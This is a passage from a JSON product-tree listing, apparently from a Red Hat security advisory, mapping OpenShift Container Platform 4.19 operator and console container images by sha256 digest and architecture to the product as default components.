"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64"
},
